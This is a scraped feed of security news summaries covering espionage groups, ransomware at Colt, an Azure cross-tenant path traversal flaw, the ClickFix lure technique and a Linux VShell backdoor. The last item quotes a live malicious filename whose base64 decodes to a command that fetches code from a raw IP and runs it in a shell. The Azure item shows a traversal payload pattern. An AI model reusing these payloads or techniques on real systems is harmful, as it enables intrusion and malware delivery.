-
Cybersecurity researchers are calling attention to malicious activity orchestrated by a China-nexus cyber espionage group known as Murky Panda that involves abusing trusted relationships in the cloud to breach enterprise networks. “The adversary has also shown considerable ability to quickly weaponize N-day and zero-day vulnerabilities and frequently achieves initial access to their targets by
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
INTERPOL on Friday announced that authorities from 18 countries across Africa have arrested 1,209 cybercriminals who targeted 88,000 victims. “The crackdown recovered $97.4 million and dismantled 11,432 malicious infrastructures, underscoring the global reach of cybercrime and the urgent need for cross-border cooperation,” the agency said. The effort is the second phase of an ongoing law
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Cyber threat actors have launched sophisticated phishing operations aimed at military and government personnel in South Asia, leveraging defense-related lures to distribute malicious archives and applications. Recent detections include ZIP files like “Coordination of the Chief of Army Staff’s Visit to China.zip,” which contain compressed PDFs designed as phishing decoys. These documents, upon extraction, redirect […]
The post Hackers Target Phones of Military-Linked Individuals in South Asia Using New Spy Tools appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The National Institute of Standards and Technology (NIST) has unveiled a comprehensive concept paper outlining proposed NIST SP 800-53 Control Overlays for Securing AI Systems, marking a significant milestone in establishing standardized cybersecurity frameworks for artificial intelligence applications.
Released on August 14, 2025, this initiative addresses the growing need for structured risk management approaches in both AI system development and deployment phases, encompassing generative AI, predictive AI, and multi-agent AI architectures.
Key Takeaways
1. NIST released Control Overlays for AI cybersecurity risk management.
2. Covers generative/predictive AI and single/multi-agent systems.
3. COSAIS project launched with Slack channel for stakeholder collaborationComprehensive Framework for AI Security Controls
The newly released concept paper establishes a foundation for managing cybersecurity risks across diverse AI implementations through the NIST SP 800-53 control framework.
The proposed overlays specifically target four critical use cases: generative AI systems that create content, predictive AI models for forecasting and analysis, single-agent AI applications, and multi-agent AI systems involving coordinated artificial intelligence entities.
These control overlays extend the existing NIST cybersecurity framework to address unique vulnerabilities inherent in AI systems, including data poisoning attacks, model inversion techniques, and adversarial machine learning threats.
The framework incorporates essential technical components such as AI model validation procedures, training data integrity controls, and algorithmic transparency requirements.
Organizations implementing these overlays will need to establish continuous monitoring mechanisms for AI system behavior, implement proper access controls for AI development environments, and maintain comprehensive audit trails for model training and deployment processes.
Control Overlays The overlays also emphasize the importance of establishing clear governance structures for AI risk management, including regular security assessments and incident response procedures specifically tailored for AI-related security events.
NIST has launched the Control Overlays for AI Project (COSAIS) alongside a dedicated Slack channel (#NIST-Overlays-Securing-AI) to facilitate stakeholder collaboration and real-time feedback collection.
This community-driven approach enables cybersecurity professionals, AI developers, and risk management specialists to contribute directly to the overlay development process through facilitated discussions with NIST principal investigators.
The implementation strategy encourages active participation from industry stakeholders who can provide insights into the practical challenges of securing AI systems in production environments.
The collaborative framework ensures that the final control overlays reflect real-world security requirements while maintaining alignment with established NIST cybersecurity standards and best practices for enterprise risk management.
Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial →The post NIST Releases Control Overlays to Manage Cybersecurity Risks in Use and Developments of AI Systems appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Pentesting remains one of the most effective ways to identify real-world security weaknesses before adversaries do. But as the threat landscape has evolved, the way we deliver pentest results hasn’t kept pace. Most organizations still rely on traditional reporting methods—static PDFs, emailed documents, and spreadsheet-based tracking. The problem? These outdated workflows introduce delays,
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Telecommunications giant Colt Technology Services has confirmed that customer data was compromised in a sophisticated cyber attack that began on August 12, 2025.
The company disclosed that threat actors accessed sensitive files containing customer information and subsequently posted document titles on the dark web, prompting immediate containment measures and law enforcement notification.
Key Takeaways
1. Colt breached on August 12, customer data accessed, and document titles on the dark web.
2. Key platforms offline as precaution, customer networks secure.
3. Forensics engaged, law enforcement notified.Customer Data Exfiltrated
The ransomware attack specifically targeted Colt’s business support systems, which the company emphasized remain segregated from customer infrastructure networks.
Upon detection at approximately 11:00 AM BST on August 12, Colt immediately activated its major incident response protocol and engaged external forensic investigators to assess the breach scope.
The threat actors successfully exfiltrated files from Colt’s systems before publishing the document titles on dark web forums, a common tactic used by ransomware groups to pressure victims into paying demands.
Colt has established a dedicated call center where customers can request lists of the specific filenames posted online to determine if their data may be affected.
As a precautionary measure, Colt proactively disabled multiple critical systems, including the Colt Online customer portal, Number Hosting APIs, and Colt On Demand Network-as-a-Service (NaaS) platform.
The company also suspended its Voice On Demand services and temporarily halted new service ordering capabilities to prevent further unauthorized access.
Mitigations
Colt’s incident response team has implemented comprehensive containment protocols, including enhanced access controls, improved detection capabilities, and strengthened security visibility across their infrastructure.
The company promptly notified the UK’s National Cyber Security Centre (NCSC) and law enforcement agencies to ensure regulatory compliance and leverage external expertise in the investigation.
The telecommunications provider has deployed specialist third-party investigation and forensic teams working around the clock to determine the full extent of the data compromise.
While customer-facing network services remain operational due to the segregated architecture, automated business processes have been temporarily suspended, resulting in extended response times for customer inquiries and service requests.
Colt has assured customers that authentication systems remain secure due to the architectural separation between business support and customer infrastructure environments.
The company continues providing customer support through dedicated phone lines and email channels across multiple regions, including the UK, France, and Germany, while working to restore full service capabilities.
Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial →The post Colt Confirms Customer Data Stolen in Ransomware Attack appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A critical vulnerability in Microsoft Azure’s API Connection infrastructure enabled attackers to compromise resources across different Azure tenants worldwide.
The flaw, which earned Gulbrandsrud a $40,000 bounty and a Black Hat presentation slot, exploited Azure’s shared API Management (APIM) instance architecture to gain unauthorized access to Key Vaults, Azure SQL databases, and third-party services like Jira and Salesforce across tenant boundaries.
The vulnerability centered on Azure’s globally shared APIM instance, where all API Connections are deployed, creating an attack surface that transcended tenant isolation.
Key Takeaways
1. Azure's DynamicInvoke endpoint allowed attackers to access other tenants' API Connections.
2. Exploited connections could compromise Key Vaults, databases, and third-party services across Azure tenants.
3. Microsoft patched quickly and paid $40,000 for breaking Azure's tenant isolation model.By manipulating the undocumented DynamicInvoke endpoint, attackers could traverse connection boundaries and access any API Connection deployed on the shared infrastructure with full backend privileges.
Azure’s Default API Connection Vulnerability
The core of the vulnerability lay in Azure Resource Manager’s (ARM) handling of the DynamicInvoke endpoint, which processes API Connection requests with super-privileged tokens.
When ARM receives a DynamicInvoke request, it constructs URLs using the pattern /apim/[ConnectorType]/[ConnectionId]/[Action-Endpoint] with elevated authentication tokens.
Gulbrandsrud discovered that by creating a custom Logic App connector with a vulnerable path parameter, attackers could inject path traversal sequences.
The researcher demonstrated this by defining a simple endpoint with a {path} parameter, then supplying malicious input like ../../../../[VictimConnectorType]/[VictimConnectionID]/[action].
When ARM processed this request, URL normalization resulted in direct access to victim connections.
The attack was demonstrated against an Azure Key Vault connection:
Mitigation
Microsoft confirmed the vulnerability within three days of the April 7, 2025, disclosure and implemented mitigations within a week.
The initial fix involved implementing a blacklist on path parameters to block ../ sequences and URL-encoded variants.
However, Gulbrandsrud noted this solution may be insufficient, suggesting potential bypasses through alternative path normalization techniques or direct API Connection path manipulation.
The vulnerability required Contributor-level privileges to the attacking tenant’s API Connection, limiting the attack surface to privileged users.
However, the global scope and cross-tenant implications made this a critical security issue affecting Azure’s fundamental tenant isolation model.
Microsoft’s substantial bounty award reflects the severity of compromising the shared infrastructure that supports Azure’s multi-tenant architecture.
Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial →The post Azure’s Default API Connection Vulnerability Enables Full Cross-Tenant Compromise appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The Belarusian-affiliated threat actor UAC-0057, also known as UNC1151, FrostyNeighbor, or Ghostwriter, has been using weaponized archives that contain phony PDFs that are posing as official invitations and documents to target organizations in Poland and Ukraine in a sophisticated cyber espionage campaign. Since April 2025, these operations have utilized compressed archives, such as RAR and […]
The post Malicious PDFs in Play: UAC-0057 Leveraging Invitations to Trigger Shell Script Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Cybersecurity researchers have identified a sophisticated social engineering technique called ClickFix that has been rapidly gaining traction among threat actors since early 2024.
This deceptive attack method targets both Windows and macOS devices, tricking users into executing malicious commands through seemingly legitimate technical troubleshooting procedures.
The technique has been observed in campaigns affecting thousands of enterprise and consumer devices globally on a daily basis, representing a significant evolution in social engineering tactics.
The ClickFix technique operates by presenting users with fake error messages, CAPTCHA verifications, or human verification prompts that appear to require immediate action to resolve minor technical issues.
.webp)
The typical ClickFix attack chain (Source – Microsoft) These lures are typically delivered through phishing emails, malicious advertisements, or compromised websites that redirect victims to specially crafted landing pages.
The attack’s effectiveness lies in its exploitation of users’ natural tendency to solve apparent technical problems, making it particularly dangerous as it bypasses traditional automated security solutions through human interaction.
Microsoft analysts identified multiple threat actors leveraging ClickFix attacks to deliver a diverse array of malicious payloads, including the prolific Lumma Stealer infostealer, remote access tools such as Xworm and AsyncRAT, loaders like Latrodectus and MintsLoader, and sophisticated rootkits including a modified version of the open-source r77.
These payloads typically operate as “fileless” malware, loaded directly into memory by living-off-the-land binaries rather than being written to disk as traditional executable files.
The attack chain begins when victims encounter visual lures that mimic legitimate services such as Cloudflare Turnstile verification, Google reCAPTCHA, or even social media platforms like Discord.
When users interact with these fake verification systems, malicious JavaScript code executes in the background, copying obfuscated commands to the user’s clipboard using the
navigator.clipboard.writeText()function.Technical Implementation and Command Execution
The core of the ClickFix technique revolves around manipulating the Windows Run dialog box, accessed through the Windows key + R shortcut.
Threat actors have strategically chosen this approach because most users are unfamiliar with this Windows component and its potential security implications.
The malicious commands typically involve PowerShell cmdlets such as
iwr(Invoke-WebRequest),irm(Invoke-RestMethod), andiex(Invoke-Expression) to download and execute payloads from remote servers..webp)
Lampion infection chain (Source – Microsoft) A notable case study involves the Lampion malware campaign first identified in May 2025, which targeted Portuguese organizations across government, finance, and transportation sectors.
The campaign utilized a sophisticated multi-stage infection process beginning with phishing emails containing ZIP files. Upon opening, these archives contained HTML files that redirected users to a fake Portuguese tax authority website hosting the ClickFix lure.
The subsequent PowerShell command downloaded an obfuscated VBScript that created additional scripts in the Windows %TEMP% directory and established persistence through scheduled tasks.
The technique’s adaptability extends beyond Windows environments, with recent campaigns observed targeting macOS users to deliver Atomic macOS Stealer (AMOS).
These attacks demonstrate the technique’s cross-platform capabilities, utilizing similar social engineering tactics while adapting the underlying commands for macOS terminal execution.
The macOS variant employed sophisticated password theft mechanisms, continuously prompting users for system passwords and utilizing the stolen credentials to bypass macOS security features through
xattr -ccommands.Detection of ClickFix attacks relies on monitoring the RunMRU registry key, which maintains a history of Run dialog executions.
Security teams can identify suspicious activity by examining entries containing living-off-the-land binaries, direct IP addresses, content delivery network domains, or files with suspicious extensions.
Microsoft’s research reveals that threat actors frequently employ obfuscation techniques including Base64 encoding, string concatenation, and escaped characters to evade detection systems.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.The post Microsoft Warns of Hackers Using ClickFix Technique to Attack Windows and macOS Devices appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts. A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash The […]
The post Stealth Threat Unpacked: Weaponized RAR Files Deliver VShell Backdoor on Linux Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
